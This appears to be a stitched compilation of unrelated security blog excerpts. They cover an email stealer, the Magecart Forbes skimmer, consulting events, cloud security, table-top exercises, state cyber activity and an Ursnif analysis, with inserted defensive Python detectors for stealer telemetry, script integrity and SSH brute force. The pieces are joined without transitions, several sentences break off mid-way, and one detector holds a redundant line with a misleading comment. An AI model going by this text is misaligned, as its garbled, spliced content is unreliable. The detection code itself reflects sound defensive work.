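The behaviour chain described in this section (terminate outlook.exe, stage references under %TEMP%, spawn a batch script from %TEMP% that cleans up the executable) can be turned into a simple host-side correlation for EDR telemetry. This is an added example, not code from the Yoroi report; the event schema, field names and sample events are constructed, and real telemetry would need a field mapping first.

```python
"""Correlate the host behaviour of the email stealer described above: a process that
kills outlook.exe, stages files under %TEMP% and removes itself via a batch script.

Added example, not code from the Yoroi report. The event schema, field names and the
sample events are constructed; real EDR telemetry needs a field mapping first.
"""
from datetime import datetime, timedelta

TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
# Processes that end Outlook for legitimate reasons and must not raise an alert.
BENIGN_TERMINATORS = {"outlook.exe", "explorer.exe", "taskmgr.exe", "services.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _in_temp(path: str) -> bool:
    return any(marker in path.lower() for marker in TEMP_MARKERS)


def detect_email_stealer(events: list, window: timedelta = timedelta(minutes=10)) -> list:
    """Return one alert per suspect process, each with its ordered evidence chain.

    Each event is a dict with 'ts' (datetime), 'kind', 'image' (the acting process)
    and, per kind: 'target' (process_terminate), 'path' (file_create),
    'cmdline' and 'parent_image' (process_create).
    """
    suspects: dict = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        actor, kind = ev["image"], ev["kind"]
        # Stage 1: something other than Outlook itself or a user tool ends outlook.exe.
        if (kind == "process_terminate" and _base(ev["target"]) == "outlook.exe"
                and _base(actor) not in BENIGN_TERMINATORS):
            suspects.setdefault(actor, {"first_seen": ev["ts"], "evidence": []})
            suspects[actor]["evidence"].append("terminated outlook.exe")
            continue
        # Later stages count only for a process already caught at stage 1, inside the window.
        owner = actor if kind == "file_create" else ev.get("parent_image", "")
        info = suspects.get(owner)
        if info is None or ev["ts"] - info["first_seen"] > window:
            continue
        if kind == "file_create" and _in_temp(ev["path"]):
            info["evidence"].append(f"wrote {ev['path']}")            # staged references
        elif (kind == "process_create" and _base(actor) == "cmd.exe"
                and ".bat" in ev["cmdline"].lower() and _in_temp(ev["cmdline"])):
            info["evidence"].append(f"spawned batch script: {ev['cmdline']}")
    return [{"image": image, **info} for image, info in suspects.items()
            if len(info["evidence"]) >= 2]


# Constructed sample telemetry; the stealer path is a placeholder, not an IoC.
T0 = datetime(2019, 5, 20, 9, 0, 0)
STEALER = "C:\\Users\\bob\\AppData\\Roaming\\svc_update.exe"
OUTLOOK = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
SAMPLE_EVENTS = [
    {"ts": T0, "kind": "process_terminate", "image": STEALER, "target": OUTLOOK},
    {"ts": T0 + timedelta(seconds=5), "kind": "file_create", "image": STEALER,
     "path": "C:\\Users\\bob\\AppData\\Local\\Temp\\found_mail.dat"},
    {"ts": T0 + timedelta(seconds=40), "kind": "file_create", "image": STEALER,
     "path": "C:\\Users\\bob\\AppData\\Local\\Temp\\clean.bat"},
    {"ts": T0 + timedelta(seconds=41), "kind": "process_create",
     "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": STEALER,
     "cmdline": 'cmd.exe /c "C:\\Users\\bob\\AppData\\Local\\Temp\\clean.bat"'},
    # Benign noise: the user closes Outlook from Task Manager; a browser writes a temp file.
    {"ts": T0 + timedelta(minutes=2), "kind": "process_terminate",
     "image": "C:\\Windows\\System32\\Taskmgr.exe", "target": OUTLOOK},
    {"ts": T0 + timedelta(minutes=3), "kind": "file_create",
     "image": "C:\\Program Files\\Google\\Chrome\\chrome.exe",
     "path": "C:\\Users\\bob\\AppData\\Local\\Temp\\scoped_dir1\\x.tmp"},
]

if __name__ == "__main__":
    for alert in detect_email_stealer(SAMPLE_EVENTS):
        print("ALERT:", alert["image"])
        for line in alert["evidence"]:
            print("   -", line)
```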
Analysis of Exposed Emails
This section shows some statistics about the emails harvested in the attack campaign, recovered during surveillance and hunting operations. We built a graph sorting the most frequent TLD occurrences across all the stolen data.
As seen in the graph above, the most frequent TLD is .com with 193,194 occurrences, followed by .kr with 102,025 occurrences, .cn with 26,160 occurrences, .it with 6,317 occurrences, and so on. To better visualize the macro-locations involved in this exposure, we built a heatmap showing the geographical distribution of the top 100 countries referenced in the TLDs.
The heatmap shows the less affected countries in a greenish color, while the most affected ones tend toward orange or red. The first thing that emerges from these two distributions is that this specific threat does not seem to be targeted: the diffusion is almost global, with red or orange zones in the UK, Italy, the Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded a thousand occurrences.
Nowadays, email accounts are an effective source of revenue for cyber criminals. All this information can be used to spread other malware through phishing campaigns, to perform BEC (Business Email Compromise) attacks, and to attempt credential stuffing attacks.
Even a simple info-stealer like this one can be a dangerous threat, especially when used by organized groups in conjunction with other malware implants. In fact, as also reported by the independent researcher Germán Fernández Bacian, this email stealer has recently been used by the infamous TA505 hacking group. This link means, with good confidence, that the exposed data, full email accounts in some cases and email contacts in general, is now available to a cyber-criminal group that launched targeted attacks against the banking and retail industries in the recent past.
Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.
The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.
The Magecart group is back; this time the hackers injected a skimmer script into the Forbes magazine subscription website.
The malicious traffic was spotted by the security expert Troy Mursch, Chief Research Officer of Bad Packets, on Wednesday.
The expert immediately attempted to report his discovery to Forbes via email, but without success.
The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.
A Forbes spokesperson told El Reg that it is investigating the incident and that, at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activity.
Forbes was likely the victim of a supply chain attack: Magecart hackers compromised a company that provides services to the media outlet.
During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.
Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.
“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published by RiskIQ.
Thousands of other companies that are customers of Picreel are at risk; potentially affected domains are listed here.
Security firms have monitored the activities of at least a dozen Magecart groups since 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.
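As an added illustration (not from the article, RiskIQ, Picreel or Forbes), this is the control that keeps a swapped supplier script from loading: pin the third-party script with Subresource Integrity and re-verify the served bytes against the pin. The script bodies and the URL are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed sample: the third-party script body the site owner reviewed and
# approved, and a later copy that differs (here only an appended comment; any
# change to the served bytes, a skimmer included, fails the check the same way).
APPROVED_SCRIPT = b"window.vendorWidget = function () { /* reviewed widget code */ };\n"
MODIFIED_SCRIPT = APPROVED_SCRIPT + b"/* unreviewed change served by the supplier */\n"

# Algorithms browsers accept for SRI, weakest to strongest.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(script: bytes, algo: str = "sha384") -> str:
    """Return one integrity token ("sha384-<base64 digest>") for the script bytes."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, script).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, script: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag to embed; crossorigin is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(script, algo)}" '
            f'crossorigin="anonymous"></script>')


def _algo(token: str) -> str:
    return token.partition("-")[0]


def verify_sri(script: bytes, integrity: str) -> bool:
    """Re-implement the browser's check for a fetched copy of the script.

    The integrity attribute may carry several whitespace-separated tokens; the
    strongest algorithm present is used and the bytes are accepted if any token
    of that algorithm matches. Unlike a browser, which loads the script when no
    usable token is present, this checker fails closed.
    """
    tokens = [t for t in integrity.split() if _algo(t) in SRI_ALGORITHMS]
    if not tokens:
        return False
    strongest = max(_algo(t) for t in tokens)  # lexical order happens to match strength here
    strongest = max(tokens, key=lambda t: SRI_ALGORITHMS.index(_algo(t)))
    algo = _algo(strongest)
    actual = base64.b64encode(hashlib.new(algo, script).digest()).decode("ascii")
    return any(hmac.compare_digest(actual, t.partition("-")[2])
               for t in tokens if _algo(t) == algo)


if __name__ == "__main__":
    pin = sri_hash(APPROVED_SCRIPT)
    print(script_tag("https://supplier.example.invalid/widget.js", APPROVED_SCRIPT))
    print("approved copy verifies:", verify_sri(APPROVED_SCRIPT, pin))
    print("modified copy verifies:", verify_sri(MODIFIED_SCRIPT, pin))
```

Re-running `verify_sri` against a freshly fetched copy of each pinned supplier script (for example from CI) also tells you when the supplier changed the file, which is the moment to review it before updating the pin.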
According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.
Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.
Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy.
Tech Connect Live 2019: Dublin, 30 May
BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here.
Data Protection Officer certification course: Vilnius/Maastricht June/July
BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here.
IAM Annual Conference: Dublin, 28-30 August
Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page.
I was a panellist at the e-Crime & Cybersecurity Congress last week; the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond'. Here is a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes that a successful business continually craves. Indeed, the 'economies of scale' benefits are not just more cost-effective and more agile IT services, but also include better cybersecurity (from the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business's cloud migration, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given that the board ultimately owns the cybersecurity risk, which is an operational business risk.
There are security pitfalls with cloud services. The marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure; after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.
Cloud Security should not be an afterthought
It is essential for security to be baked into a new cloud service's design, requirements determination and procurement process, and in particular to define and document the areas of security responsibility with the intended cloud service provider.
Cloud does not absolve the business of its security responsibilities
All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibility to define and document:
Cloud Service Provider Owned
Shared (Cloud Service Provider & Business)
Business Owned
For example, with a PaaS model the business is fully responsible for application deployment onto the cloud platform, and therefore for the security of the applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. An example of 'shared' responsibility in this model is the process of provisioning and managing privileged operating system accounts within the cloud environment.
Regardless of the cloud model, data is always the responsibility of the business.
A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversee the controls and processes through regular assessments.
The cloud security guidance resources I recommended were:
If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.
These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on
Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.
What happens next?
That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.
The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?
A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).
Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.
The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.
Fail to prepare, prepare to fail
When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:
If your policy says ‘contact the regulator’, ask which one(s)
Who is the specific point of contact at the regulator’s office?
Does your organisation have the email address or phone numbers for that person?
Who in your company or agency is authorised to talk to the regulator?
When are they likely to need to have that conversation?
Do you have pre-prepared scripts or statements for when things might go wrong (for customers, stakeholders, staff, and media, including social media channels)?
It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?
That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)
By the (play)book
It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”
Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated
According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.
Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and to know what steps are available to you when bad things happen for real.
Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks
Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.
Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.
There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.
Current perceptions surrounding Cybergangs
Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.
How Cybergangs are using Technology to Work Smarter and Cheaper
Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.
The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.
IoT Vulnerabilities on the Rise
According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030. With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.
Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.
Why Cybersecurity Mindsets must Change
IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.
To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.
It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.
Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.
In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach; they can also degrade the performance of the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
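An added example (not part of the guest article or of F5's tooling) of the monitoring the two paragraphs above call for: a detector that walks constructed sshd-style auth log lines, raises a brute-force alert when one source exceeds a failure threshold inside a sliding window, flags probes against well-known default account names, and flags a success that follows such a burst.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of syslog-style sshd lines (not from the article). One source
# hammers default account names and then logs in; another fails once, legitimately.
SAMPLE_LOG = """\
Jun 20 10:00:01 web1 sshd[2011]: Failed password for admin from 203.0.113.7 port 51000 ssh2
Jun 20 10:00:03 web1 sshd[2012]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun 20 10:00:04 web1 sshd[2013]: Failed password for invalid user guest from 203.0.113.7 port 51004 ssh2
Jun 20 10:00:06 web1 sshd[2014]: Failed password for root from 203.0.113.7 port 51006 ssh2
Jun 20 10:00:08 web1 sshd[2015]: Failed password for admin from 203.0.113.7 port 51008 ssh2
Jun 20 10:00:09 web1 sshd[2016]: Accepted password for admin from 203.0.113.7 port 51010 ssh2
Jun 20 10:05:00 web1 sshd[2020]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Jun 20 10:05:30 web1 sshd[2021]: Accepted password for alice from 198.51.100.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Account names that ship as vendor defaults on many appliances and images
# (an assumed list for this example; extend it with the defaults of your own stack).
DEFAULT_ACCOUNTS = {"admin", "administrator", "root", "guest", "support"}


def parse_line(line: str, year: int = 2019):
    """Return {"ts", "result", "user", "ip"} for an sshd auth line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog lines carry no year
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_access_attacks(lines, threshold: int = 5, window_seconds: int = 60):
    """Scan lines in order and return alert dicts of three kinds:
    brute_force            - at least `threshold` failures from one IP inside the window
    success_after_failures - a login succeeded from an IP that had already tripped the threshold
    default_account_probe  - a failure against a well-known default account name
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    tripped = set()                 # ips that already raised brute_force (alert once per ip)
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if ev["user"] in DEFAULT_ACCOUNTS:
                alerts.append({"type": "default_account_probe", "ip": ip, "user": ev["user"], "ts": ts})
            if len(q) >= threshold and ip not in tripped:
                tripped.add(ip)
                alerts.append({"type": "brute_force", "ip": ip, "count": len(q), "ts": ts})
        elif ip in tripped:
            # A success right after a burst of failures is the signal worth paging on.
            alerts.append({"type": "success_after_failures", "ip": ip, "user": ev["user"], "ts": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_access_attacks(SAMPLE_LOG.splitlines()):
        print(alert)
```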
Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.
The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car servicing and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was more likely caused by a general lack of security patching and anti-virus protection than by anything sophisticated.
According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023. The new COC marks NATO’s understanding of the importance of cyberspace in conflict, particularly in times of political tension that have resulted in cyber malfeasance targeting elections and critical infrastructure. The establishment of the COC is a natural evolution in addressing cyber attacks in a more timely manner, by integrating cyber actions with more conventional military capabilities. In early 2014, after cyber incidents had featured in the international incidents in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement under Article 5 of the treaty.
In those particular instances, Russia was suspected of orchestrating, or at least tacitly supporting, the cyber attacks that afflicted both states. Since then, Russia’s alleged cyber activities have only become more brazen in their scale and aggressiveness. From suspected involvement in cyber attacks against Ukrainian critical infrastructure to a variety of cyber operations meddling in the elections of foreign governments, Russia has taken advantage of the uncertainty of cyberspace, where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to the point of war.
NATO has always provided a strong military counterpoint to Russian influence in the European region, and projecting a credible threat in cyberspace is an important complement to NATO's capabilities. Previously, however, NATO didn’t have any cyber weapons of its own, a significant problem given Russia’s perceived position as a near-peer adversary of the United States. With the establishment of the cyber command, the United States, United Kingdom, and Estonia have offered the Alliance their cyber capabilities. As described in one news article, the Alliance hopes to integrate individual nations’ cyber capabilities into Alliance operations, coordinated through the COC and under the command of NATO’s top general. With this in hand, it will be interesting to see whether it serves as the deterrent it is intended to be, and how Russia may adjust its cyber activities, particularly against NATO member countries.
However, the Alliance still faces the lingering problem of rules of engagement. Classifying cyber attacks under Article 5 is a start, but it doesn’t provide a path forward for how NATO can and should engage with and respond to cyber attacks. While this gives NATO a certain flexibility in addressing cyber attacks, allowing the Alliance to take each on a case-by-case basis when determining the extent of its response, it does not give adversarial states an idea of which cyber activities are tolerated and which are not. This shortcoming serves only to give states like Russia enough wiggle-room to continue their offensive cyber operations as long as they don’t cross an undefined threshold. It has long been hypothesized that attacks crippling critical infrastructure would meet that threshold, but as seen in Ukraine, this bar keeps being pushed a little farther each time.
The COC is a much-needed instrument in NATO’s overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate retaliate against, cyber attacks. That said, as long as there are no clear lines between what will and will not be deemed acceptable in cyberspace, the status quo will stay pretty much in place. Once fully operational, the first test of the COC will be how it responds, and in what proportion, to an attack against a member state. At that point all eyes will turn to Russia to see how it reacts and alters how and where it conducts its operations.
There has been a recent focus on alleged Iranian cyber activity over the past few weeks, spurred on by the publication of a vendor report on Iranian operations. Per the vendor’s findings, not only was Iran likely behind activity targeting government and the private sector in the Middle East, it was using National Security Agency exploits that were stolen and dumped into the public domain by the Shadow Brokers group in April 2017. As recently as late August 2018, Iran is suspected of trying to launch influence operations ahead of the midterm elections. The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its toolbox for conducting retaliatory attacks.
The new reporting comes at a time when Russia’s cyber malfeasance has largely dominated the press, due to its influence operations and election shenanigans, not just in the United States but in other countries as well. Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and SWIFT banking transactions before that. Iran was propelled onto the scene with the Operation Ababil DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi Aramco. Some consider Iran a powerful cyber nation on par with, or close to, China and Russia. Others maintain that Iranian actors are much less sophisticated, preferring to use “tried-and-true tactics while targeting many individuals.” China initially led state cyber espionage activity, which was largely curbed against the United States once the “no hack” pact was agreed in 2015.
There seems to be a perpetual “revolving door” of news-cycle focus on suspected state activity, with new reports on hostile espionage and exploitation against global targets. The purpose of these appears to be to track the latest escapades of these governments, which in most cases use publicly available tools and exploits (see Shadow Brokers above) and vectors that are routine for any hostile cyber actor (certainly, if a state actor is “sophisticated”, the intimation is that the activity hasn’t been detected yet, or that the sophisticated tools and exploits haven’t been deployed yet).
Between the ongoing stories of adversarial state activity mentioned above and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the “hostile state actor as monolith” narrative into the public eye. Yet, as the saying goes, “if everything is important, nothing is important,” which rings true with regard to state cyber activity. Actual activity or incidents that threaten to disrupt, destroy, degrade, deny, or manipulate data systems or the data resident on them deserve to be pushed to the forefront, as they potentially impact everyone at all levels.
But theft of intellectual property and state secrets affects a minority, and will rarely if ever impact everyday citizens. The same vigorous scrutiny and analysis applied to suspected state activity should apply to the cyber crime ecosystem, whose nefarious endeavors directly impact the global population. And while there are isolated instances of law enforcement arresting groups and individuals or taking down marketplaces, this has failed to put a dent in a global industry that was cited as the second most reported economic crime, according to a 2017 report by the same vendor.
This needs to change, and it would be welcome to see vendors with the wide and deep visibility into the cyber threat space needed to uncover some of the more “sophisticated” state actors apply that precision against a threat intent on exploiting everyone on the planet. Some of the more notable breaches have exposed a high volume of individual data:
2013/14 Yahoo 3 Billion Accounts
2016 Adult Friend Finder 412 Million Accounts
2014 eBay 145 Million Users
2017 Equifax 143 Million Users
2008 Heartland Payment Systems 134 Million credit cards
One thing is clear – cyber criminals have proven to be as sophisticated and resourceful as state actors, often using the same tools and techniques. The fact that this category of cyber actor is not as robustly tracked, with information shared directly with the appropriate authorities, is disappointing.
Today I'd like to share a full path analysis, including a kickback attack, which took me to full access to an entire Ursnif/Gozi botnet.
In other words: from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".
NB: The Federal Police have already been alerted on this topic, as well as national and international CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been contacted. If you have had no idea about this topic until now it means, with high probability, that you/your company are not involved in this threat. I am not going to publicly disclose the victims' IPs.
This disclosure follows the ethical disclosure procedure, which is close to the responsible disclosure procedure but mainly focused on incidents rather than on vulnerabilities.
Since blogging is not my business, and I write on my personal blog to share knowledge on cyber security, I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the malware code found, nor the malware Command and Control code, nor details on the attacker's group, since I won't hand future attackers new malware source code ready to be used.
My entire "cyber adventure" began from a simple email with a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which, as of August 21 2018, was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to get started through a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like to de-obfuscate hidden code (every time it's like a personal challenge). After some hard-working minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charge of evading three main AVs, namely Kaspersky Lab, Panda Security and Trend Micro, by running simple scans on Microsoft Regedit, and of dropping and executing additional software.
Indeed, if none of the searched AVs was found on the target system, Stage1 acted as a simple downloader. The specific actions performed follow:
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admins can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by Anunak APT during bank frauds in the past few years.
The Stage2 analysis (huge step ahead here) brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section with high entropy in it. It's a significant indication of decrypter activity.
Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section
